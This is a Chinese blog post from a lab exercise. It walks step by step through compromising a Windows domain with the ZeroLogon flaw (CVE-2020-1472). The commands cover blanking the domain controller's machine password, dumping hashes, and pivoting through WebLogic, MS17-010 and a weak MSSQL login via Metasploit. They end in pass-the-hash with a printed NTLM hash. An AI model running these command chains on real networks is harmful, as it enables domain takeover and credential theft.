域渗透-NetLogon域内提权漏洞(CVE-2020-1472)利用

于 2024-10-20 01:56:34 发布
阅读量690 收藏 11
点赞数 4
CC 4.0 BY-SA版权
分类专栏: 内网渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyytaotao/article/details/143087159

在这里插入图片描述

1.环境介绍:

域主机:10.10.10.8
sqlserver:10.10.10.18
win7:10.10.10.7    10.10.20.7
weblogic: 10.10.20.12     192.168.0.133

2.利用脚本文件

前提:本机可以访问内网,可以访问10.10.10.0/24网段(二级隧道搭建完成)

在此目录下打开cmd;
在这里插入图片描述

首先将域控的机器账号密码置空:

python cve-2020-1472-exploit.py owa 10.10.10.8

在这里插入图片描述

利用机器用户及空密码先获取域管administrator用户的hash,留作后面使用

python secretsdump.py redteam.red/owa$@10.10.10.8 -just-dc -no-pass

在这里插入图片描述

获取域控shell权限:

python wmiexec.py -hashes  获取的域管administrator用户的hash  redteam.red/Administrator@10.10.10.8

在这里插入图片描述

3.利用MSF

3.1一次穿透-获取weblogic权限

通过nuclei扫描工具扫描出weblogic存在的可以利用的漏洞,然后使用WebLogic-GUI工具注入内存马,再通过冰蝎进行连接,,,,

然后进入我们的kali中的msf,首先冰蝎反弹shell到msf:
在这里插入图片描述

msf: 
msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 0.0.0.0
show options   (查看配置)
run -v     (运行之后进行监听等待反弹shell)

在这里插入图片描述
在这里插入图片描述

3.2 二次穿透-利用ms17-010获取win7权限

获取weblogic权限后设置路由:

run autoroute -s 10.10.20.0/24
run autoroute -p

在这里插入图片描述

background   回到后台
search ms17-010
use 0
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.10.20.7
show options
run -v

在这里插入图片描述

3.3三次穿透-获取sqlserver权限

根据信息收集扫描出的结果,我们知道sqlserver有弱口令sa:sa;

background
search mssql     查询可以利用的mssql模块

在这里插入图片描述

利用获得win7的权限,设置路由,使得所有访问10.10.10.0/24网段的流量都经过session 2

sessions -i 2
run autoroute -s 10.10.10.0/24
run autoroute -p

在这里插入图片描述

background
use auxiliary/admin/mssql/mssql_sql
show options  先查看一下我们需要配置哪些选项
set rhost 10.10.10.18
set password sa
show options

在这里插入图片描述在这里插入图片描述

结果显示成功利用,,,那么我们修改一下sql语句,进行我们想要运行的命令

set Sql EXEC xp_cmdshell 'whoami';
show options
run -v

在这里插入图片描述在这里插入图片描述

3.4哈希传递攻击(pass-the-hash,pth)

哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。

在域环境中:
只能是域管理员组内用户(可以是域管理员组内非administrator用户)的哈希值才能进行哈希传递攻击,攻击成功后,可以访问域内任何一台机器。

有些时候,当我们获取到了某台主机的 administrator 用户的密码哈希值 ,并且该主机的445端口打开着。我们则可以利用 exploit/windows/smb/psexec 模块用MSF进行远程登录(哈希传递攻击)

msf > use  exploit/windows/smb/psexec
set smbuser administrator
set rhost 10.10.10.8
set payload windows/meterpreter/bind_tcp
set smbpass aad3b435b51404eeaad3b435b51404ee:ae4c0d5fb959fda8f4cb1d14a8376af4   
-->这个域控管理员用户hash密码利用CVE-2020-1472漏洞已获得
show options
run -v

在这里插入图片描述
在这里插入图片描述

CVE-2020-1472域渗透 NetLogon 漏洞
千寻的博客
06-13 544
模拟环境:获取了一个加入了域的计算机限,在system账号限的情况下,将域管密码置空,导出域管hash,然后进行连接
内网渗透(六十四)CVE-2020-1472 NetLogon 漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-08 1023
2020年8月份微软发布的安全公告中,有一个十分紧急的漏洞——CVE-2020-1472 NetLogon 漏洞。通过该漏洞,未经身份验证的攻击者只需要能访问域控的135端口即可通过 NetLogon 远程协议连接域控并重置域控机器的Hash,从而导致攻击者可以利用域控的机器账户导出域内所有用户的Hash(域控的机器账户默认具有DCSync限),进而接管整个域。该漏洞存在的原因是Netlogon协议认证的加密模块存在缺陷,导致攻击者可以在没有凭据的情况下通过认证。
CVE-2020-1472复现与完整利用
热门推荐
Shanfenglan's blog
10-10 14万+
CATALOG漏洞原理利用1.修改文件impacket.dcerpc.v5.nrpc2.置空机器账户yukong$密码3.读取administrator密码4.下载目标的sam文件为下一步恢复机器密码做准备5.破解sam文件查看过去的机器密码6.重制密码yukong$机器密码7.查看密码是否恢复成功 漏洞原理 原理比较复杂,有兴趣的可以看看下面链接上的文章https://www.freebuf.com/articles/system/249860.html 利用 1.修改文件impacket.dcerpc.
CVE-2020-1472 NetLogon 漏洞
qq_53579360的博客
02-07 970
windows
CVE-2020-1472 ZeroLogon漏洞分析利用
mingyqf的博客
02-24 1674
CVE-2020-1472 ZeroLogon漏洞分析利用 暗影安全团队 2021-01-26 14:27:56 102316 0x01漏洞简介 CVE-2020-1472是一个windows域控中严重的远程漏洞,此漏洞是微软8月份发布安全公告披露的紧急漏洞,CVSS评分为10分。未经身份认证的攻击者可通过使用 Netlogon 远程协议(MS-NRPC)连接域控制器来利用漏洞,成功利用漏洞的攻击者可获得域管理员限。该漏洞由 Secura 公司的 Tom Tervoort 发现交并命名为 Z
内网定位+CVE-2020-1472-利用过程
课嗨教育的专栏
04-01 340
域控(Win2008):192.168.199.131 域用户(Win7):192.168.199.128 域用户(Win03):192.168.199.129 漏洞验证工具:https://github.com/SecuraBV/CVE-2020-1472 利用+重置工具:https://github.com/risksense/zerologon 重置 hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472 工具运行环境:http
滥用CVE-2020-1472(Zerologon)接管域,然后修复本地存储的机器账号密码_Python_下载.zip
04-28
标题中的"CVE-2020-1472",又称为"Zerologon",是一个严重安全漏洞,影响了微软的Netlogon身份验证协议。这个漏洞允许攻击者未经身份验证就能完全控制域控制器,从而可以访问网络中的所有资源。Zerologon在2020年被...
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&域控系统&NetLogon&ADCS&PAC&KDC&永恒之蓝&CVE漏洞
HACKONE的博客
06-24 773
当Windows系统的Active Directory证书服务(CS)在域上运行时,由于机器账号中的dNSHostName属性不具有唯一性,域中普通用户可以将其更改为高限的域控机器账号属性,然后从Active Directory证书服务中获取域控机器账户的证书,导致域中普通用户升为域管理员限。set payload windows/x64/meterpreter/bind_tcp //正向连接上线。run post/multi/manage/autoroute //添加当前路由表。
Python脚本测试CVE-2020-1472 Zerologon漏洞
总结来说,CVE-2020-1472是一个严重的安全漏洞利用它可以轻松获得域控制器的完全控制。企业和组织应立即采取措施,包括安装官方供的安全更新来修补漏洞,以及定期使用像ZeroLogon这样的脚本进行漏洞扫描,确保...
ZeroLogon (CVE-2020-1472) 漏洞利用
Captain_RB的博客
10-24 1万+
ZeroLogon (CVE-2020-1472) 是近几年Windows上曝出的高危漏洞,CVSS V3.0评分10.0,攻击者只需要定位域控主机名及IP,并且可以访问域控,就可以在无需任何凭据的情况下 (可在域外) 拿到域管理员的限。
Netlogon漏洞复现(CVE-2020-1472
我们为什么能在这里遇到?
09-24 1072
NetLogon 介绍 NetLogon 远程协议是一种在 Windows 域控上使用的 RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用 NTLM 协议登录服务器,也用于 NTP 响应认证以及更新计算机域密码。 漏洞描述 攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的 Netlogon 安全通道时,存在特漏洞。当成功利用漏洞时,攻击者无需通过身份验证,即可在网络中的设备上运行经特殊设计的应用程序,获取域控制器的管理员限。 影响版本
CVE-2020-1472 Netlogon漏洞分析
further_eye的博客
11-09 1310
漏洞主要是由于在使用Netlogon安全通道与域控进行连接时,由于认证协议加密部分的缺陷,导致攻击者可以将域控管理员用户的密码置为空,从而进一步实现密码hash获取并最终获得管理员限。成功的利用可以实现以管理员限登录域控设备,并进一步控制整个域。
CVE-2020-1472(zero-logon)
include_heqile的博客
11-22 416
https://mp.weixin.qq.com/s/BZ_-ud67FpUgkP48GCtBUA
CVE-2020-1472(域内)
p01son的博客
08-02 806
CVE-2020-1472(域内) Created: July 7, 2021 5:25 PM 文章目录CVE-2020-1472(域内)简介影响范围复现环境复现过程恢复原机器hash参考 简介 CVE-2020-1472是一个windows域控中严重的远程漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的
WEB渗透Win-CVE-2020-1472
最新发布
qq_59468567的博客
08-29 317
使用 IP 地址代替FQDN 用 Windows API 来强制 NTLM 重置密码为Waza1234/Waza1234/Waza1234/从 secretsdump 恢复密码 将本地注册表机密转储到最新版本时,secretsdump 将自动转储明文机器密码(十六进制编码)激活一个虚拟环境来安装impacket。查找 DC 的旧 NT 哈希。执行dcsync导出hash。从一个没加入域的机器测试。执行,并且设置密码为空。
CVE 2020-1472 Netlogon 漏洞
明哥哥知识分享
10-13 353
1.复现环境 DC: os:windows 2012 server ip:192.168.236.132 攻击机: os:kali ip:192.168.236.130 2.影响版本 Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 201
域渗透04-漏洞CVE-2020-1472
GalaxySpaceX的博客
10-12 822
域渗透04-漏洞CVE-2020-1472
CVE-2020-1472 域内利用(域
墨痕诉清风的博客
01-25 2446
域控(Win2008):192.168.199.131 域用户(Win7):192.168.199.128 域用户(Win03):192.168.199.129 漏洞验证工具:https://github.com/SecuraBV/CVE-2020-1472 利用+重置工具:https://github.com/risksense/zerologon 重置hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472 工具运行环境:https://.
CVE-2020-1472-ZeroLogon复现
qq_56426046的博客
11-15 1333
Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远 程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值